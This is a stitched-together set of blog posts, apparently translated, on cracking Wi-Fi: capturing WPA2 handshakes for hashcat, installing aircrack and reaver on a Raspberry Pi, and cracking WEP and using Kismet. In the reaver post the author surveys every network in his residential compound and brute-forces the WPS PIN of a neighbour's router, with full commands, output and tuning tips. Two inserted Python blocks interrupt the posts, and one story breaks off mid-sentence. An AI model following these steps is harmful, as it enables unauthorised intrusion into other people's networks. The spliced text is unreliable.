Cracking WPA2 with Hashcat

Author: Secer  Published: February 21, 2014  Categories: Linux notes, Wireless security

So for all those who got to see the show at Defcon's wireless village, that talk focused more on the drinking of the Rolling Rock than the cracking of the hashes.

I said in my ramblings that it was really really really easy.

Here is a how to...  with some example files for you to follow along with.

First you want to capture some traffic.  I leave the logistics of how up to you.

For this demo, we will be using a file which I grabbed online from the wireshark wiki.

http://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=wpa-Induction.pcap

Now that you have some traffic in the form of a PCAP, fire up wireshark.

The first thing I do is enter "eapol" in the filter bar. If EAPOL frames show up, we have a handshake. You can skip this step if you really, really want to, but remember the whole "trust but verify" thing.


Since WPA2 uses the SSID as the salt when it derives the key, it helps to know what the SSID is. Using the Find menu in Wireshark, search for the string SSID.


So the SSID is named "Coherer" which is good because at least it isn't Linksys.

Now for the hardest part: you need to convert your pcap file to an hccap file. Hashcat has a cloud version of the converter, which works great. You can use command-line tools as well, but the point of the talk was to not use aircrack.

https://hashcat.net/cap2hccap/

In real life we all use aircrack anyway, so here are two commands you can use.

I have used this...

aircrack-ng <cap> -J <hccap>

This could work as well...

wpaclean <out> <in>

wpaclean can damage your file, so back it up if you want to give it a try.

Now you have your hccap file.

Download the latest version of oclHashcat from here.

Run this below:

cudaHashcat-plus64.exe --hash-type 2500 wpa.hccap dict.txt


For the demo I used a dictionary with one word, for speed, but that word is in the rockyou list (entry 922007).

I use cudaHashcat-plus64.exe because I have an NVIDIA card and a 64-bit system. The base application may change, but the flags are the same and the passwords are still weak.
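As an added illustration of the "eapol" check earlier in this walkthrough (my own Python, not the original post's or hashcat's code), here is a parser that picks WPA2 EAPOL-Key frames out of raw 802.11 data frames and records which of the four handshake messages appeared for each AP/station pair, so a capture that only holds the AP's message 1 is not mistaken for a usable handshake. It works on raw frames, so a pcap reader would have to strip the radiotap header first; the MAC addresses and key-info values in the sample are constructed.

```python
import struct
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")         # LLC/SNAP header with EtherType 0x888e
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 1 << 6, 1 << 7, 1 << 8, 1 << 9   # EAPOL-Key key-info bits
EAPOL_KEY, RSN = 3, 2                                       # EAPOL type 3 = Key; descriptor 2 = WPA2

def parse_eapol_key(frame):
    """(addr1, addr2, key_info) if `frame` is an 802.11 data frame carrying WPA2 EAPOL-Key, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 2:       # frame-control type 2 = data
        return None
    hdr = 24 + (6 if frame[1] & 0x3 == 0x3 else 0) + (2 if frame[0] & 0x80 else 0)  # addr4, QoS field
    body = frame[hdr:]
    if len(body) < 15 or body[:8] != LLC_SNAP_EAPOL or body[9] != EAPOL_KEY:
        return None
    descriptor, key_info = struct.unpack("!BH", body[12:15])
    return (frame[4:10], frame[10:16], key_info) if descriptor == RSN else None

def message_number(key_info):
    """Classify an EAPOL-Key frame as 4-way handshake message 1..4 from its flag bits."""
    ack, mic = key_info & KI_ACK, key_info & KI_MIC
    if ack and not mic:
        return 1
    if ack and mic and key_info & KI_INSTALL:
        return 3
    if mic and not ack:
        return 4 if key_info & KI_SECURE else 2

def handshakes(frames):
    """Map (AP, station) MAC pairs to the handshake messages seen; {1, 2, 3, 4} is a complete exchange."""
    seen = {}
    for frame in frames:
        parsed = parse_eapol_key(frame)
        msg = parsed and message_number(parsed[2])
        if msg:
            ap, sta = (parsed[1], parsed[0]) if msg in (1, 3) else (parsed[0], parsed[1])  # M1/M3: AP -> STA
            seen.setdefault((ap.hex(":"), sta.hex(":")), set()).add(msg)
    return seen

def build_eapol_key(addr1, addr2, bssid, key_info, from_ds):
    """Constructed sample: QoS data frame + LLC/SNAP + EAPOL-Key with zeroed nonce/MIC/key fields."""
    header = bytes([0x88, 0x02 if from_ds else 0x01, 0, 0]) + addr1 + addr2 + bssid + bytes(4)
    key_body = struct.pack("!BH", RSN, key_info) + bytes(92)
    return header + LLC_SNAP_EAPOL + struct.pack("!BBH", 2, EAPOL_KEY, len(key_body)) + key_body

AP, STA = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")   # constructed MACs
SAMPLE_FRAMES = [                                           # constructed capture: one full handshake
    build_eapol_key(STA, AP, AP, 0x008A, True),   # M1: ACK
    build_eapol_key(AP, STA, AP, 0x010A, False),  # M2: MIC
    build_eapol_key(STA, AP, AP, 0x13CA, True),   # M3: ACK + MIC + Install + Secure
    build_eapol_key(AP, STA, AP, 0x030A, False),  # M4: MIC + Secure
]
```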

Happy cracking!


I've been busy lately, so here's a lazy blog update, reposted from:

http://www.n00bz.net/blog/2013/8/8/cracking-wpa2-with-hashcat.html

Running aircrack and reaver on a Raspberry Pi to crack router PIN codes

Author: Secer  Published: December 28, 2012  Category: Wireless security

[email protected]
Disclaimer: this article is for security study purposes only. Recently, on a whim, I wanted to test every wireless signal in my residential compound. Given that most routers today support WPS, you all surely know the aircrack and reaver tools; for cracking PIN codes they are the must-have remedy for every occasion. Running a brute-force tool like reaver used to mean keeping a host powered on 24 hours a day, which really wastes power. Very not green! Not eco-friendly!
The Raspberry Pi, for its part, makes a very capable attack environment. Enthusiasts abroad have already built Debian-based systems for this board dedicated to network attack and testing, but this article is about installing aircrack and reaver on the Raspberry Pi's official distribution. I power the Pi with an Apple charger and a Mini USB cable, and a single Alfa wireless card is enough. With power draw this low it's an excellent setup for running PIN attacks and long-running wireless captures.

PS: if you already know all this, feel free to skip... Without further ado, the install procedure is as follows.

1. Prepare the system environment

apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion


2. Install aircrack

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng/
make
make install
cd ../


3. Install reaver

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
make install
cd ../


4. Use aircrack to find nearby routers with WPS enabled. Evil... hehe

airmon-ng start wlan0
airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:0E:2E:FD:C4:BB   -1        0        0    0  -1  -1                    <length:  0>
4C:E6:76:60:3F:20  -13      123        0    0  11  54e  WPA2 CCMP   PSK  cuier-1
B0:48:7A:52:F4:72  -23       42        0    0   1  54e. WPA2 CCMP   PSK  FAST_52F472
8C:21:0A:5F:A2:FA  -35       28        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_5FA2FA
E0:05:C5:D3:3F:00  -42       33        0    0   2  54e. WPA2 CCMP   PSK  TP-LINK_D33F00
EC:17:2F:7D:12:1E  -49       56        1    0   6  54e. WPA2 CCMP   PSK  wg7788
B0:48:7A:5D:22:EA  -51       36        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_1202
C4:CA:D9:6D:6F:B0  -52       30       10    0  11  54e. OPN              ChinaNet
8C:21:0A:8F:2F:1A  -54       18        0    0   1  54e. WPA2 CCMP   PSK  hechengyv
E0:05:C5:C5:70:E8  -55       15        0    0   4  54e. WPA2 CCMP   PSK  wtangqiu
C8:3A:35:55:D1:D8  -55       20        2    0   7  54e. WPA  CCMP   PSK  Tenda_55D1D8
8C:21:0A:84:89:8C  -56       24        0    0   1  54e. WPA2 CCMP   PSK  BATE
C4:CA:D9:6D:5F:60  -55       15        2    0   6  54e. OPN              ChinaNet
EC:17:2F:54:01:2E  -56       13        0    0   1  54e. WPA2 CCMP   PSK  diguadawang
5C:63:BF:74:56:52  -53       18        2    0   1  54e. WPA2 CCMP   PSK  cocohe
08:10:76:40:C2:92  -58       21        0    0   1  54e  WPA2 CCMP   PSK  flytv
E0:05:C5:C0:60:42  -56       21        0    0   9  54e. WPA2 CCMP   PSK  HZLYL
38:83:45:C1:BE:F8  -59       14        1    0   6  54e. WPA2 CCMP   PSK  TICO081122
C4:CA:D9:74:B3:80  -57       13        1    0  11  54e. OPN              ChinaNet
EC:88:8F:AB:F6:5E  -59        5        0    0   4  54e. WPA2 CCMP   PSK  TP-LINK_ABF65E
6C:E8:73:B0:67:78  -59        8        0    0   6  54e. WPA2 CCMP   PSK  WJJ~LOVE~WW
C8:3A:35:19:D6:78  -61        9        0    0   1  54e  WPA  CCMP   PSK  Tenda_19D678
E0:05:C5:19:9C:04  -61       18        0    0   7  54 . WPA2 CCMP   PSK  1-14-1-602
C8:64:C7:5A:46:16  -60        3        0    0  11  54e  WPA  CCMP   PSK  STB_CDCF
6C:E8:73:45:A7:E6  -60        6        0    0   4  54e. WPA2 CCMP   PSK  TP-LINK_45A7E6
1C:BD:B9:F5:E5:D7  -61       16        0    0   1  54   WPA2 CCMP   PSK  D-Link_DIR-600M
C4:CA:D9:6D:6E:B0  -61       12        0    0   1  54e. OPN              ChinaNet
C8:64:C7:5A:46:15  -61       17        0    0  11  54e  WPA  CCMP   PSK  VIDEOPHONE_CDCF
C8:64:C7:5A:46:17  -61       12        0    0  11  54e  WPA  CCMP   PSK  BACKUP
EC:88:8F:99:75:F2  -61        5        0    0   4  54e. WPA2 CCMP   PSK  6786
8C:21:0A:1E:60:26  -61        3        0    0   1  54e. WPA2 CCMP   PSK  yue
00:23:CD:5B:A7:9E  -61        2        0    0   6  54 . WEP  WEP         1203 wireless
14:E6:E4:44:9B:8E  -62        6        0    0   4  54e. WPA2 CCMP   PSK  bujiankai
00:1D:0F:81:72:06  -62        4        0    0   6  54 . WEP  WEP         Line
FC:C8:97:94:B6:C8  -62        7        0    0  11  54e  WPA  CCMP   PSK  CU_6cmn
B0:48:7A:2A:1B:E6  -62        7        0    0   6  54e. WPA  CCMP   PSK  302
EC:88:8F:8F:CD:BB  -62       11        0    0  11  54e. WPA2 CCMP   PSK  haloso2
EC:17:2F:AC:44:A2  -62        7        0    0   1  54e. WPA2 CCMP   PSK  1-401
C8:64:C7:5A:46:14  -63       24        0    0  11  54e  WPA  CCMP   PSK  CU_CDCF
38:83:45:B5:E3:96  -63        6        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_B5E396
C8:3A:35:2B:35:68  -63       11        0    0  11  54e  WPA2 CCMP   PSK  Tenda_2B3568
00:27:19:6D:4A:5A  -63        1        0    0  11  54e. WPA2 CCMP   PSK  JUJIA-FOGUANG
FC:C8:97:94:B6:CB  -65        9        0    0  11  54e  WPA  CCMP   PSK  BACKUP
FC:C8:97:94:B6:C9  -63       15        0    0  11  54e  WPA  CCMP   PSK  VIDEOPHONE_6cmn
C8:3A:35:06:63:B0  -64        3        0    0   1  54e  WPA2 CCMP   PSK  Tenda_0663B0
8C:21:0A:B0:22:92  -64        3        0    0   1  54e. WPA2 CCMP   PSK  810
14:E6:E4:4F:DE:FE  -64        3        0    0   1  54e. WPA2 CCMP   PSK  YM+ZM
FC:C8:97:94:B6:CA  -65       13        0    0  11  54e  WPA  CCMP   PSK  STB_6cmn
C8:3A:35:52:70:60  -65        2        0    0  11  54e. WPA  CCMP   PSK  Tenda_527060
00:26:5A:B3:08:7E  -65        8        0    0  13  54e  WPA2 CCMP   PSK  503
F4:EC:38:56:6B:DE  -62        2        0    0   9  54e. WPA2 CCMP   PSK  WTO
14:D6:4D:A0:19:60  -62        3        0    0  11  54e  WPA2 TKIP   PSK  wang~XB
C4:CA:D9:6D:6F:40  -62        1        0    0   1  54e. OPN              ChinaNet
^C

Done. There really are a lot of wireless signals in the compound... mainly thanks to the Alfa card... heh

5. Use reaver to crack the password of a router with WPS enabled

Take this one, for example; the signal is decent:

8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA

[email protected]:~/soft/reaver-1.4#  reaver  -i  mon0  -b 8C:21:0A:5F:A2:FA  -a  -S  -vv  -d2  -t 5 -c 1
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 8C:21:0A:5F:A2:FA
[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
^C


That starts the cracking; just wait patiently for the result... Don't be too evil. Doing a bit of testing is fine, but be a good kid...

########################################################################## Appendix: some tips for tuning reaver's parameters
reaver:
-i   interface name after enabling monitor mode
-b   target MAC address
-a   auto-detect the best settings for the target AP
-S   use small DH keys (speeds up cracking)
-vv  show more non-critical warnings
-d   delay: idle time between attempts, default 1 second
-t   timeout: maximum time to wait for a response on each attempt
-c   specify the channel to make the signal easier to find, e.g. -c 1 for channel 1; check your target's channel and adjust accordingly
     (for non-TP-LINK routers, -d9 -t9 is recommended to keep the router from locking up; example:
     reaver -i mon0 -b MAC -a -S -d9 -t9 -vv)
Adjust the parameters to the situation (the examples below all use -c 1, i.e. target channel 1):
Target signal very strong: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
Target signal ordinary: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
Target signal so-so: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
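Step 4's listing, as an added example (my own Python, not the author's or aircrack-ng's code): a parser for airodump-ng's AP table plus an audit pass that flags the networks a survey of your own site should call out (open, WEP, legacy WPA, or the TKIP cipher). The listing it runs on is constructed to mirror the layout of the output above, including the quirks that break a naive split on whitespace.

```python
import re

# Constructed sample in the layout of the airodump-ng listing above (locally administered
# MACs, made-up ESSIDs). It keeps the quirks that trip up naive parsing: the "54 ." MB
# column, the hidden-SSID row with no ENC column, and an ESSID that contains a space.
SAMPLE_LISTING = """\
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
02:00:00:00:00:01   -1        0        0    0  -1  -1                    <length:  0>
02:00:00:00:00:02  -35       28        0    0   1  54e. WPA2 CCMP   PSK  home-ap
02:00:00:00:00:03  -52       30       10    0  11  54e. OPN              cafe-free
02:00:00:00:00:04  -55       20        2    0   7  54e. WPA  CCMP   PSK  legacy-wpa
02:00:00:00:00:05  -61        2        0    0   6  54 . WEP  WEP         old wireless
02:00:00:00:00:06  -62        3        0    0  11  54e  WPA2 TKIP   PSK  mixed-mode
"""
AP_ROW = re.compile(r"^[0-9A-F]{2}(:[0-9A-F]{2}){5}\s")   # AP rows start with a BSSID

def parse_airodump(text):
    """Return one dict per AP row; the header and any non-AP lines are skipped."""
    aps = []
    for line in text.splitlines():
        if not AP_ROW.match(line):
            continue
        cols = line.split()
        rest = cols[8:] if cols[7:8] == ["."] else cols[7:]   # drop the stray "." of "54 ."
        ap = dict(bssid=cols[0], pwr=int(cols[1]), ch=int(cols[5]), enc="", cipher="", auth="", essid="")
        if not rest or rest[0].startswith("<length"):         # hidden SSID: no ENC column printed
            ap["essid"] = " ".join(rest)
        elif rest[0] == "OPN":                                 # OPN: no CIPHER/AUTH columns
            ap.update(enc="OPN", essid=" ".join(rest[1:]))
        elif rest[0] == "WEP":                                 # WEP: CIPHER but no AUTH
            ap.update(enc="WEP", cipher=rest[1], essid=" ".join(rest[2:]))
        else:                                                  # WPA/WPA2: ENC CIPHER AUTH ESSID
            ap.update(enc=rest[0], cipher=rest[1], auth=rest[2], essid=" ".join(rest[3:]))
        aps.append(ap)
    return aps

def weak_networks(aps):
    """Findings a survey of your own site should raise: open, WEP, legacy WPA or the TKIP cipher."""
    findings = []
    for ap in aps:
        if ap["enc"] == "OPN":
            reason = "open network, traffic is unencrypted"
        elif ap["enc"] == "WEP":
            reason = "WEP, key recoverable from captured traffic"
        elif ap["enc"] == "WPA" or ap["cipher"] == "TKIP":
            reason = "legacy WPA/TKIP, move to WPA2-CCMP or WPA3"
        else:
            continue
        findings.append((ap["bssid"], ap["essid"], reason))
    return findings
```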

WEP with no client is no longer a mystery: cracked all the same

Author: Secer  Published: June 22, 2012  Categories: Linux notes, Wireless security

Posting a beginner's tutorial on cracking WEP wireless:

Many friends give up on WEP as soon as there is no client. Now I bring you good news: with no client you can still crack it.

Here is how the story happened; it was a chance encounter.

A friend of mine bought a Card X today and didn't know how to "learn" passwords, so he called me over to teach him. A friend's a friend, so I grabbed a taxi to his place right away.

I installed the driver for him and went into BT3 to learn the password. I saw DATA was 0 with no checkmark after it, and I felt pretty uneasy, thinking: my friend called me here to teach him to learn passwords,

and if I can't pull it off, wouldn't that be embarrassing? Regardless, I picked a 0841 and left it capturing packets, then asked my friend out for a smoke, and we chatted while smoking.

We chatted about all sorts of things: the Sahara, Obama, and finally a woman... Cigarettes finished, I walked back to the computer, and the DATA in the capture column was still a big, round

O. I thought all hope was gone; it still wasn't rising. My friend asked how much longer, and I said soon.

With no other choice, I got out my own laptop, plugged in the Card X, booted BT3 and tried learning it from the command line to see whether it would work.

I hammered at the keyboard, commands appearing one by one, and just as I reached the step of doing the fake association with the target AP, a flash of inspiration hit me:

what if I did the fake association from my laptop and see whether it made the DATA on my friend's machine rise? I typed the command at once, and afterwards walked step by step toward

my friend's computer, silently praying (Bodhisattva bless me, Jesus bless me, Namo Amitabha). With every step toward his computer my heart pounded,

thinking: you'd better rise, or I'm out of here... Finally I got to the computer, and my friend and I looked: I was stunned, DATA was shooting up, hundreds at a time.

I immediately looked at the client section: 00:1A:EF:0A:38:38, that address looked so familiar. I ran back to my laptop and scrolled the shell up, up to

Basic use of the wireless tool Kismet / cracking wireless passwords

Author: Secer  Published: December 31, 2011  Category: Wireless security

Kismet (http://www.kismetwireless.net/) is a sniffer for 802.11b wireless networks, used to capture information about the wireless networks in an area.

Features include: support for most wireless cards (Linksys, D-Link, Rangelan, Cisco Aironet cards, and Orinoco based cards); automatic IP block detection via UDP, ARP and DHCP packets; listing of Cisco devices via Cisco Discovery Protocol; logging of weakly encrypted packets; packet dump files compatible with Ethereal and tcpdump; and mapping of detected networks with estimated network range.

1. Supports handling of Cisco CDP data.

2. Supports decoding of WEP (Wired Equivalent Privacy) packets. WEP security is derived from RSA's RC4 data encryption technology, to meet users' higher-level network security needs.

3. Automatically detects the structure of every wireless access point (AP).

4. Automatically converts data into visual charts.

5. Kismet supports WEP (Wired Equivalent Privacy) encryption. WEP security is derived from RSA's RC4 data encryption technology, to meet users' higher-level network security needs.

Typically Kismet 2.71 can crack a WEP key with 500,000 to 1,000,000 packets of traffic (3 to 6 hours; with active attack methods added, a few minutes is enough).

Kismet installation and configuration examples

A. Installing and configuring Kismet on Ubuntu 9.04 with an Intel 5100 card

Configure Kismet by editing the source line, whose format is Source=type,interface,name[,channel]:
#sudo vim /etc/kismet/kismet.conf
For the latest 5100 wireless cards it needs to be set to:

Source= iwl4965, wlan0, intel5100

If you also want to run it in the shell in curses mode (a text-based graphical interface):
#sudo vim /etc/kismet/kismet_ui.conf
Edit:
gui=curses

Start Kismet
First the WNIC must be activated, then put into promiscuous (monitor) mode:
#sudo ifconfig wlan0 down   # bring the card down; the mode can only be changed while it is down
#sudo iwconfig wlan0 mode monitor
#ifconfig wlan0 up

Finally run the kismet script:
#kismet
After that you will be in the Kismet interface.

B. Configuration on Fedora Core 2 with an Atheros card

System: RedHat Fedora Core 2
WNIC: standard Atheros/802.11G/PCI wireless card
Driver: madwifi-ng-r1531-20060427
Compiler: gcc version 3.3.3 20040412 (Red Hat Linux 3.3.3-7)

Install Kismet
#cd /usr/local/sbin
#wget http://demonalex.3322.org/download/wireless/kismet-2006-04-R1.tar.gz
#tar -zxvf kismet-2006-04-R1.tar.gz
#cd kismet-2006-04-R1
#./configure --disable-setuid
#make dep
#make && make install
